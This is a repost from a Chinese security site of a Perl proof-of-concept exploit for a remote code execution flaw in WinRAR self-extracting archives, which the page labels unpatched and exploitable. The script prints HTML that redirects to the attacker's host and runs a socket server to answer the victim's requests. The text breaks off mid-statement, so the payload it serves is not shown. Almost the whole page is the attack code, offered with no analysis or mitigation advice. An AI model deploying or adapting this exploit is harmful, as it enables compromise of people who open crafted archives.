WinRAR 压缩工具可执行远程代码漏洞poc

颓废 2019年5月19日09:59:22评论462 views字数 993阅读3分18秒阅读模式
摘要

未修复可利用

未修复可利用

PoC: Exploit Code #!/usr/bin/perl # Title : WinRaR SFX – Remote Code Execution # Tested on Windows 7 / Server 2008 / Server 2003 # # l0s4r.com  use strict; use warnings; use IO::Socket; use MIME::Base64 qw( decode_base64 ); use Socket ‘inet_ntoa’; use Sys::Hostname ‘hostname’;  print ” Mohammad Reza Espargham/n/n”; my $ip = inet_ntoa(scalar gethostbyname(hostname() || ‘localhost’));  my $port = 80;  print “Winrar HTML Code/n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://&apos; . $ip . ‘”></head></html>’.”/n/n” if($port==80); print “Winrar HTML Code/n”.'<html><head><title>poc</title><META http-equiv=”refresh” content=”0;URL=http://&apos; . $ip . ‘:’ . $port . ‘”></head></html>’.”/n/n” if($port!=80);  my $server = new IO::Socket::INET( Proto => ‘tcp’, LocalPort => $port, Listen => SOMAXCONN, ReuseAddr => 1) or die “Unable to create server socket”;  # Server loop while(my $client = $server->accept()) { my $client_info; while(<$client>) { last if /^/r/n$/; $client_info .= $_; } incoming($client, $client_info); }  sub incoming { print “/n=== Incoming Request:/n”; my $client = shift; print $c

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
颓废
  • 本文由 发表于 2019年5月19日09:59:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   WinRAR 压缩工具可执行远程代码漏洞pochttp://cn-sec.com/archives/68379.html

发表评论

匿名网友 填写信息